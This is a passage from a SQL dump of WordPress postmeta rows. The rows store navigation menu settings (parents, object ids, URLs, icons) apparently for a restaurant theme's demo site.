3521,'_menu_item_menu_item_parent','3425'),(35843,3521,'_menu_item_object_id','1658'),(35844,3521,'_menu_item_object','page'),(35845,3521,'_menu_item_target',''),(35846,3521,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35847,3521,'_menu_item_xfn',''),(35848,3521,'_menu_item_url',''),(35849,3521,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35850,3521,'_menu_item_icon','icon-star'),(35851,3521,'_menu_item_icon_pack','simple_line_icons'),(35852,3522,'_menu_item_type','post_type'),(35853,3522,'_menu_item_menu_item_parent','3429'),(35854,3522,'_menu_item_object_id','1658'),(35855,3522,'_menu_item_object','page'),(35856,3522,'_menu_item_target',''),(35857,3522,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35858,3522,'_menu_item_xfn',''),(35859,3522,'_menu_item_url',''),(35860,3522,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35861,3522,'_menu_item_icon','icon-star'),(35862,3522,'_menu_item_icon_pack','simple_line_icons'),(35863,3523,'_menu_item_type','post_type'),(35864,3523,'_menu_item_menu_item_parent','3428'),(35865,3523,'_menu_item_object_id','1662'),(35866,3523,'_menu_item_object','page'),(35867,3523,'_menu_item_target',''),(35868,3523,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35869,3523,'_menu_item_xfn',''),(35870,3523,'_menu_item_url',''),(35871,3523,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35872,3523,'_menu_item_icon','null'),(35873,3524,'_menu_item_type','post_type'),(35874,3524,'_menu_item_menu_item_parent','3424'),(35875,3524,'_menu_item_object_id','1662'),(35876,3524,'_menu_item_object','page'),(35877,3524,'_menu_item_target',''),(35878,3524,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35879,3524,'_menu_item_xfn',''),(35880,3524,'_menu_item_url',''),(35881,3524,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35882,3524,'_menu_item_icon','null'),(35883,3525,'_menu_item_type','post_type'),(35884,3525,'_menu_item_menu_item_parent','3425'),(35885,3525,'_menu_item_object_id','1722'),(35886,3525,'_menu_item_object','page'),(35887,3525,'_menu_item_target',''),(35888,3525,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35889,3525,'_menu_item_xfn',''),(35890,3525,'_menu_item_url',''),(35891,3525,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35892,3525,'_menu_item_icon','icon-star'),(35893,3525,'_menu_item_icon_pack','simple_line_icons'),(35894,3526,'_menu_item_type','post_type'),(35895,3526,'_menu_item_menu_item_parent','3429'),(35896,3526,'_menu_item_object_id','1722'),(35897,3526,'_menu_item_object','page'),(35898,3526,'_menu_item_target',''),(35899,3526,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35900,3526,'_menu_item_xfn',''),(35901,3526,'_menu_item_url',''),(35902,3526,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35903,3526,'_menu_item_icon','icon-star'),(35904,3526,'_menu_item_icon_pack','simple_line_icons'),(35905,3527,'_menu_item_type','post_type'),(35906,3527,'_menu_item_menu_item_parent','3428'),(35907,3527,'_menu_item_object_id','3073'),(35908,3527,'_menu_item_object','page'),(35909,3527,'_menu_item_target',''),(35910,3527,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35911,3527,'_menu_item_xfn',''),(35912,3527,'_menu_item_url',''),(35913,3527,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35914,3527,'_menu_item_icon','null'),(35915,3528,'_menu_item_type','post_type'),(35916,3528,'_menu_item_menu_item_parent','3430'),(35917,3528,'_menu_item_object_id','1734'),(35918,3528,'_menu_item_object','page'),(35919,3528,'_menu_item_target',''),(35920,3528,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35921,3528,'_menu_item_xfn',''),(35922,3528,'_menu_item_url',''),(35923,3528,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35924,3528,'_menu_item_icon','null'),(35925,3529,'_menu_item_type','post_type'),(35926,3529,'_menu_item_menu_item_parent','3424'),(35927,3529,'_menu_item_object_id','3073'),(35928,3529,'_menu_item_object','page'),(35929,3529,'_menu_item_target',''),(35930,3529,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35931,3529,'_menu_item_xfn',''),(35932,3529,'_menu_item_url',''),(35933,3529,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35934,3529,'_menu_item_icon','null'),(35935,3530,'_menu_item_type','post_type'),(35936,3530,'_menu_item_menu_item_parent','3426'),(35937,3530,'_menu_item_object_id','1734'),(35938,3530,'_menu_item_object','page'),(35939,3530,'_menu_item_target',''),(35940,3530,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35941,3530,'_menu_item_xfn',''),(35942,3530,'_menu_item_url',''),(35943,3530,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35944,3530,'_menu_item_icon','null'),(35945,3531,'_menu_item_type','post_type'),(35946,3531,'_menu_item_menu_item_parent','3397'),(35947,3531,'_menu_item_object_id','1679'),(35948,3531,'_menu_item_object','page'),(35949,3531,'_menu_item_target',''),(35950,3531,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(35951,3531,'_menu_item_xfn',''),(35952,3531,'_menu_item_url',''),(35953,3531,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(35954,3531,'_menu_item_icon','null'),(38392,3749,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38391,3749,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(38390,3749,'_menu_item_xfn',''),(38389,3749,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38388,3749,'_menu_item_target',''),(38387,3749,'_menu_item_object','custom'),(52146,4359,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52145,4359,'_menu_item_target',''),(52144,4359,'_menu_item_object','custom'),(52143,4359,'_menu_item_object_id','4359'),(52142,4359,'_menu_item_menu_item_parent','0'),(52141,4359,'_menu_item_type','custom'),(52139,4358,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52140,4358,'_menu_item_icon','null'),(38162,3726,'_menu_item_type','custom'),(38161,3725,'_menu_item_icon','null'),(38160,3725,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38159,3725,'_menu_item_url','#'),(38158,3725,'_menu_item_xfn',''),(38155,3725,'_menu_item_object','custom'),(38156,3725,'_menu_item_target',''),(38157,3725,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38353,3745,'_menu_item_icon','null'),(38352,3745,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38351,3745,'_menu_item_url','#'),(38350,3745,'_menu_item_xfn',''),(38239,3733,'_menu_item_url','#'),(38238,3733,'_menu_item_xfn',''),(38237,3733,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38236,3733,'_menu_item_target',''),(38235,3733,'_menu_item_object','custom'),(38234,3733,'_menu_item_object_id','3733'),(38233,3733,'_menu_item_menu_item_parent','0'),(38232,3733,'_menu_item_type','custom'),(52301,4375,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52290,4374,'_menu_item_url','#'),(52287,4374,'_menu_item_target',''),(52288,4374,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52289,4374,'_menu_item_xfn',''),(52283,4374,'_menu_item_type','custom'),(52284,4374,'_menu_item_menu_item_parent','4357'),(36015,3538,'_menu_item_type','post_type'),(36016,3538,'_menu_item_menu_item_parent','3425'),(36017,3538,'_menu_item_object_id','1742'),(36018,3538,'_menu_item_object','page'),(36019,3538,'_menu_item_target',''),(36020,3538,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36021,3538,'_menu_item_xfn',''),(36022,3538,'_menu_item_url',''),(36023,3538,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36024,3538,'_menu_item_icon','null'),(36025,3539,'_menu_item_type','post_type'),(36026,3539,'_menu_item_menu_item_parent','3429'),(36027,3539,'_menu_item_object_id','1742'),(36028,3539,'_menu_item_object','page'),(36029,3539,'_menu_item_target',''),(36030,3539,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36031,3539,'_menu_item_xfn',''),(36032,3539,'_menu_item_url',''),(36033,3539,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36034,3539,'_menu_item_icon','null'),(36035,3540,'_menu_item_type','post_type'),(36036,3540,'_menu_item_menu_item_parent','3424'),(36037,3540,'_menu_item_object_id','1804'),(36038,3540,'_menu_item_object','page'),(36039,3540,'_menu_item_target',''),(36040,3540,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36041,3540,'_menu_item_xfn',''),(36042,3540,'_menu_item_url',''),(36043,3540,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36044,3540,'_menu_item_icon','null'),(36045,3541,'_menu_item_type','post_type'),(36046,3541,'_menu_item_menu_item_parent','3428'),(36047,3541,'_menu_item_object_id','1804'),(36048,3541,'_menu_item_object','page'),(36049,3541,'_menu_item_target',''),(36050,3541,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36051,3541,'_menu_item_xfn',''),(36052,3541,'_menu_item_url',''),(36053,3541,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36054,3541,'_menu_item_icon','null'),(36055,3542,'_menu_item_type','post_type'),(36056,3542,'_menu_item_menu_item_parent','3407'),(36057,3542,'_menu_item_object_id','3053'),(36058,3542,'_menu_item_object','page'),(36059,3542,'_menu_item_target',''),(36060,3542,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36061,3542,'_menu_item_xfn',''),(36062,3542,'_menu_item_url',''),(36063,3542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36064,3543,'_menu_item_type','post_type'),(36065,3543,'_menu_item_menu_item_parent','3407'),(36066,3543,'_menu_item_object_id','3055'),(36067,3543,'_menu_item_object','page'),(36068,3543,'_menu_item_target',''),(36069,3543,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36070,3543,'_menu_item_xfn',''),(36071,3543,'_menu_item_url',''),(36072,3543,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36073,3544,'_menu_item_type','post_type'),(36074,3544,'_menu_item_menu_item_parent','3426'),(36075,3544,'_menu_item_object_id','1836'),(36076,3544,'_menu_item_object','page'),(36077,3544,'_menu_item_target',''),(36078,3544,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36079,3544,'_menu_item_xfn',''),(36080,3544,'_menu_item_url',''),(36081,3544,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36082,3544,'_menu_item_icon','null'),(36083,3545,'_menu_item_type','post_type'),(36084,3545,'_menu_item_menu_item_parent','3427'),(36085,3545,'_menu_item_object_id','1827'),(36086,3545,'_menu_item_object','page'),(36087,3545,'_menu_item_target',''),(36088,3545,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36089,3545,'_menu_item_xfn',''),(36090,3545,'_menu_item_url',''),(36091,3545,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36092,3545,'_menu_item_icon','null'),(36093,3546,'_menu_item_type','post_type'),(36094,3546,'_menu_item_menu_item_parent','3430'),(36095,3546,'_menu_item_object_id','1836'),(36096,3546,'_menu_item_object','page'),(36097,3546,'_menu_item_target',''),(36098,3546,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36099,3546,'_menu_item_xfn',''),(36100,3546,'_menu_item_url',''),(36101,3546,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36102,3546,'_menu_item_icon','null'),(36103,3547,'_menu_item_type','post_type'),(36104,3547,'_menu_item_menu_item_parent','3431'),(36105,3547,'_menu_item_object_id','1827'),(36106,3547,'_menu_item_object','page'),(36107,3547,'_menu_item_target',''),(36108,3547,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36109,3547,'_menu_item_xfn',''),(36110,3547,'_menu_item_url',''),(36111,3547,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36112,3547,'_menu_item_icon','null'),(36113,3548,'_menu_item_type','post_type'),(36114,3548,'_menu_item_menu_item_parent','3408'),(36115,3548,'_menu_item_object_id','3054'),(36116,3548,'_menu_item_object','page'),(36117,3548,'_menu_item_target',''),(36118,3548,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36119,3548,'_menu_item_xfn',''),(36120,3548,'_menu_item_url',''),(36121,3548,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36122,3549,'_menu_item_type','post_type'),(36123,3549,'_menu_item_menu_item_parent','3408'),(36124,3549,'_menu_item_object_id','3052'),(36125,3549,'_menu_item_object','page'),(36126,3549,'_menu_item_target',''),(36127,3549,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36128,3549,'_menu_item_xfn',''),(36129,3549,'_menu_item_url',''),(36130,3549,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36131,3550,'_menu_item_type','post_type'),(36132,3550,'_menu_item_menu_item_parent','3408'),(36133,3550,'_menu_item_object_id','3051'),(36134,3550,'_menu_item_object','page'),(36135,3550,'_menu_item_target',''),(36136,3550,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36137,3550,'_menu_item_xfn',''),(36138,3550,'_menu_item_url',''),(36139,3550,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36140,3551,'_menu_item_type','post_type'),(36141,3551,'_menu_item_menu_item_parent','3408'),(36142,3551,'_menu_item_object_id','3049'),(36143,3551,'_menu_item_object','page'),(36144,3551,'_menu_item_target',''),(36145,3551,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36146,3551,'_menu_item_xfn',''),(36147,3551,'_menu_item_url',''),(36148,3551,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36149,3552,'_menu_item_type','post_type'),(36150,3552,'_menu_item_menu_item_parent','3410'),(36151,3552,'_menu_item_object_id','3065'),(36152,3552,'_menu_item_object','page'),(36153,3552,'_menu_item_target',''),(36154,3552,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36155,3552,'_menu_item_xfn',''),(36156,3552,'_menu_item_url',''),(36157,3552,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36158,3553,'_menu_item_type','post_type'),(36159,3553,'_menu_item_menu_item_parent','3410'),(36160,3553,'_menu_item_object_id','3066'),(36161,3553,'_menu_item_object','page'),(36162,3553,'_menu_item_target',''),(36163,3553,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36164,3553,'_menu_item_xfn',''),(36165,3553,'_menu_item_url',''),(36166,3553,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36167,3554,'_menu_item_type','post_type'),(36168,3554,'_menu_item_menu_item_parent','3410'),(36169,3554,'_menu_item_object_id','3067'),(36170,3554,'_menu_item_object','page'),(36171,3554,'_menu_item_target',''),(36172,3554,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36173,3554,'_menu_item_xfn',''),(36174,3554,'_menu_item_url',''),(36175,3554,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36176,3555,'_menu_item_type','post_type'),(36177,3555,'_menu_item_menu_item_parent','3411'),(36178,3555,'_menu_item_object_id','1679'),(36179,3555,'_menu_item_object','page'),(36180,3555,'_menu_item_target',''),(36181,3555,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36182,3555,'_menu_item_xfn',''),(36183,3555,'_menu_item_url',''),(36184,3555,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38401,3750,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38400,3750,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(38399,3750,'_menu_item_xfn',''),(38398,3750,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38397,3750,'_menu_item_target',''),(52168,4361,'_menu_item_url','#'),(52167,4361,'_menu_item_xfn',''),(52165,4361,'_menu_item_target',''),(52164,4361,'_menu_item_object','custom'),(52163,4361,'_menu_item_object_id','4361'),(52162,4361,'_menu_item_menu_item_parent','0'),(52158,4360,'_menu_item_xfn',''),(52159,4360,'_menu_item_url','#'),(52160,4360,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52161,4361,'_menu_item_type','custom'),(38396,3750,'_menu_item_object','custom'),(38395,3750,'_menu_item_object_id','3750'),(38394,3750,'_menu_item_menu_item_parent','3741'),(38393,3750,'_menu_item_type','custom'),(52157,4360,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52156,4360,'_menu_item_target',''),(52155,4360,'_menu_item_object','custom'),(52154,4360,'_menu_item_object_id','4360'),(52152,4360,'_menu_item_type','custom'),(52151,4359,'_menu_item_icon','null'),(36221,3560,'_menu_item_type','post_type'),(36222,3560,'_menu_item_menu_item_parent','3415'),(36223,3560,'_menu_item_object_id','1679'),(36224,3560,'_menu_item_object','page'),(36225,3560,'_menu_item_target',''),(36226,3560,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36227,3560,'_menu_item_xfn',''),(36228,3560,'_menu_item_url',''),(36229,3560,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36230,3561,'_menu_item_type','post_type'),(36231,3561,'_menu_item_menu_item_parent','3413'),(36232,3561,'_menu_item_object_id','3054'),(36233,3561,'_menu_item_object','page'),(36234,3561,'_menu_item_target',''),(36235,3561,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36236,3561,'_menu_item_xfn',''),(36237,3561,'_menu_item_url',''),(36238,3561,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36239,3562,'_menu_item_type','post_type'),(36240,3562,'_menu_item_menu_item_parent','3413'),(36241,3562,'_menu_item_object_id','3052'),(36242,3562,'_menu_item_object','page'),(36243,3562,'_menu_item_target',''),(36244,3562,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36245,3562,'_menu_item_xfn',''),(36246,3562,'_menu_item_url',''),(36247,3562,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36248,3563,'_menu_item_type','post_type'),(36249,3563,'_menu_item_menu_item_parent','3413'),(36250,3563,'_menu_item_object_id','3049'),(36251,3563,'_menu_item_object','page'),(36252,3563,'_menu_item_target',''),(36253,3563,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36254,3563,'_menu_item_xfn',''),(36255,3563,'_menu_item_url',''),(36256,3563,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36257,3564,'_menu_item_type','post_type'),(36258,3564,'_menu_item_menu_item_parent','3413'),(36259,3564,'_menu_item_object_id','3043'),(36260,3564,'_menu_item_object','page'),(36261,3564,'_menu_item_target',''),(36262,3564,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36263,3564,'_menu_item_xfn',''),(36264,3564,'_menu_item_url',''),(36265,3564,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36266,3565,'_menu_item_type','post_type'),(36267,3565,'_menu_item_menu_item_parent','3430'),(36268,3565,'_menu_item_object_id','1857'),(36269,3565,'_menu_item_object','page'),(36270,3565,'_menu_item_target',''),(36271,3565,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36272,3565,'_menu_item_xfn',''),(36273,3565,'_menu_item_url',''),(36274,3565,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36275,3565,'_menu_item_icon','null'),(36276,3566,'_menu_item_type','post_type'),(36277,3566,'_menu_item_menu_item_parent','3430'),(36278,3566,'_menu_item_object_id','1852'),(36279,3566,'_menu_item_object','page'),(36280,3566,'_menu_item_target',''),(36281,3566,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36282,3566,'_menu_item_xfn',''),(36283,3566,'_menu_item_url',''),(36284,3566,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36285,3566,'_menu_item_icon','null'),(36286,3567,'_menu_item_type','post_type'),(36287,3567,'_menu_item_menu_item_parent','3426'),(36288,3567,'_menu_item_object_id','1857'),(36289,3567,'_menu_item_object','page'),(36290,3567,'_menu_item_target',''),(36291,3567,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36292,3567,'_menu_item_xfn',''),(36293,3567,'_menu_item_url',''),(36294,3567,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36295,3567,'_menu_item_icon','null'),(36296,3568,'_menu_item_type','post_type'),(36297,3568,'_menu_item_menu_item_parent','3426'),(36298,3568,'_menu_item_object_id','1852'),(36299,3568,'_menu_item_object','page'),(36300,3568,'_menu_item_target',''),(36301,3568,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36302,3568,'_menu_item_xfn',''),(36303,3568,'_menu_item_url',''),(36304,3568,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36305,3568,'_menu_item_icon','null'),(36306,3569,'_menu_item_type','post_type'),(36307,3569,'_menu_item_menu_item_parent','3431'),(36308,3569,'_menu_item_object_id','3074'),(36309,3569,'_menu_item_object','page'),(36310,3569,'_menu_item_target',''),(36311,3569,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36312,3569,'_menu_item_xfn',''),(36313,3569,'_menu_item_url',''),(36314,3569,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36315,3569,'_menu_item_icon','null'),(36316,3570,'_menu_item_type','post_type'),(36317,3570,'_menu_item_menu_item_parent','3427'),(36318,3570,'_menu_item_object_id','3074'),(36319,3570,'_menu_item_object','page'),(36320,3570,'_menu_item_target',''),(36321,3570,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36322,3570,'_menu_item_xfn',''),(36323,3570,'_menu_item_url',''),(36324,3570,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36325,3570,'_menu_item_icon','null'),(36326,3571,'_menu_item_type','post_type'),(36327,3571,'_menu_item_menu_item_parent','3425'),(36328,3571,'_menu_item_object_id','1995'),(36329,3571,'_menu_item_object','page'),(36330,3571,'_menu_item_target',''),(36331,3571,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36332,3571,'_menu_item_xfn',''),(36333,3571,'_menu_item_url',''),(36334,3571,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36335,3571,'_menu_item_icon','null'),(36336,3572,'_menu_item_type','post_type'),(36337,3572,'_menu_item_menu_item_parent','3429'),(36338,3572,'_menu_item_object_id','1995'),(36339,3572,'_menu_item_object','page'),(36340,3572,'_menu_item_target',''),(36341,3572,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36342,3572,'_menu_item_xfn',''),(36343,3572,'_menu_item_url',''),(36344,3572,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36345,3572,'_menu_item_icon','null'),(36346,3573,'_menu_item_type','post_type'),(36347,3573,'_menu_item_menu_item_parent','3396'),(36348,3573,'_menu_item_object_id','3054'),(36349,3573,'_menu_item_object','page'),(36350,3573,'_menu_item_target',''),(36351,3573,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36352,3573,'_menu_item_xfn',''),(36353,3573,'_menu_item_url',''),(36354,3573,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36355,3573,'_menu_item_icon','null'),(36356,3574,'_menu_item_type','post_type'),(36357,3574,'_menu_item_menu_item_parent','3396'),(36358,3574,'_menu_item_object_id','3052'),(36359,3574,'_menu_item_object','page'),(36360,3574,'_menu_item_target',''),(36361,3574,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36362,3574,'_menu_item_xfn',''),(36363,3574,'_menu_item_url',''),(36364,3574,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36365,3574,'_menu_item_icon','null'),(36366,3575,'_menu_item_type','post_type'),(36367,3575,'_menu_item_menu_item_parent','3396'),(36368,3575,'_menu_item_object_id','3051'),(36369,3575,'_menu_item_object','page'),(36370,3575,'_menu_item_target',''),(36371,3575,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36372,3575,'_menu_item_xfn',''),(36373,3575,'_menu_item_url',''),(36374,3575,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36375,3575,'_menu_item_icon','null'),(36376,3576,'_menu_item_type','post_type'),(36377,3576,'_menu_item_menu_item_parent','3396'),(36378,3576,'_menu_item_object_id','3049'),(36379,3576,'_menu_item_object','page'),(36380,3576,'_menu_item_target',''),(36381,3576,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36382,3576,'_menu_item_xfn',''),(36383,3576,'_menu_item_url',''),(36384,3576,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36385,3576,'_menu_item_icon','null'),(36386,3577,'_menu_item_type','post_type'),(36387,3577,'_menu_item_menu_item_parent','3396'),(36388,3577,'_menu_item_object_id','3048'),(36389,3577,'_menu_item_object','page'),(36390,3577,'_menu_item_target',''),(36391,3577,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36392,3577,'_menu_item_xfn',''),(36393,3577,'_menu_item_url',''),(36394,3577,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36395,3577,'_menu_item_icon','null'),(36396,3578,'_menu_item_type','post_type'),(36397,3578,'_menu_item_menu_item_parent','3396'),(36398,3578,'_menu_item_object_id','3058'),(36399,3578,'_menu_item_object','page'),(36400,3578,'_menu_item_target',''),(36401,3578,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36402,3578,'_menu_item_xfn',''),(36403,3578,'_menu_item_url',''),(36404,3578,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36405,3578,'_menu_item_icon','null'),(36406,3579,'_menu_item_type','post_type'),(36407,3579,'_menu_item_menu_item_parent','3396'),(36408,3579,'_menu_item_object_id','3059'),(36409,3579,'_menu_item_object','page'),(36410,3579,'_menu_item_target',''),(36411,3579,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36412,3579,'_menu_item_xfn',''),(36413,3579,'_menu_item_url',''),(36414,3579,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36415,3579,'_menu_item_icon','null'),(36416,3580,'_menu_item_type','post_type'),(36417,3580,'_menu_item_menu_item_parent','3396'),(36418,3580,'_menu_item_object_id','3057'),(36419,3580,'_menu_item_object','page'),(36420,3580,'_menu_item_target',''),(36421,3580,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36422,3580,'_menu_item_xfn',''),(36423,3580,'_menu_item_url',''),(36424,3580,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36425,3580,'_menu_item_icon','null'),(36426,3581,'_menu_item_type','post_type'),(36427,3581,'_menu_item_menu_item_parent','3396'),(36428,3581,'_menu_item_object_id','3050'),(36429,3581,'_menu_item_object','page'),(36430,3581,'_menu_item_target',''),(36431,3581,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36432,3581,'_menu_item_xfn',''),(36433,3581,'_menu_item_url',''),(36434,3581,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36435,3581,'_menu_item_icon','null'),(36436,3582,'_menu_item_type','post_type'),(36437,3582,'_menu_item_menu_item_parent','3426'),(36438,3582,'_menu_item_object_id','2019'),(36439,3582,'_menu_item_object','page'),(36440,3582,'_menu_item_target',''),(36441,3582,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36442,3582,'_menu_item_xfn',''),(36443,3582,'_menu_item_url',''),(36444,3582,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36445,3582,'_menu_item_icon','null'),(36446,3583,'_menu_item_type','post_type'),(36447,3583,'_menu_item_menu_item_parent','3430'),(36448,3583,'_menu_item_object_id','2019'),(36449,3583,'_menu_item_object','page'),(36450,3583,'_menu_item_target',''),(36451,3583,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36452,3583,'_menu_item_xfn',''),(36453,3583,'_menu_item_url',''),(36454,3583,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36455,3583,'_menu_item_icon','null'),(36456,3584,'_menu_item_type','post_type'),(36457,3584,'_menu_item_menu_item_parent','3431'),(36458,3584,'_menu_item_object_id','1948'),(36459,3584,'_menu_item_object','page'),(36460,3584,'_menu_item_target',''),(36461,3584,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36462,3584,'_menu_item_xfn',''),(36463,3584,'_menu_item_url',''),(36464,3584,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(36465,3584,'_menu_item_icon','null'),(36466,3585,'_menu_item_type','post_type'),(36467,3585,'_menu_item_menu_item_parent','3427'),(36468,3585,'_menu_item_object_id','1948'),(36469,3585,'_menu_item_object','page'),(36470,3585,'_menu_item_target',''),(36471,3585,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(36472,3585,'_menu_item_xfn',''),(36473,3585,'_m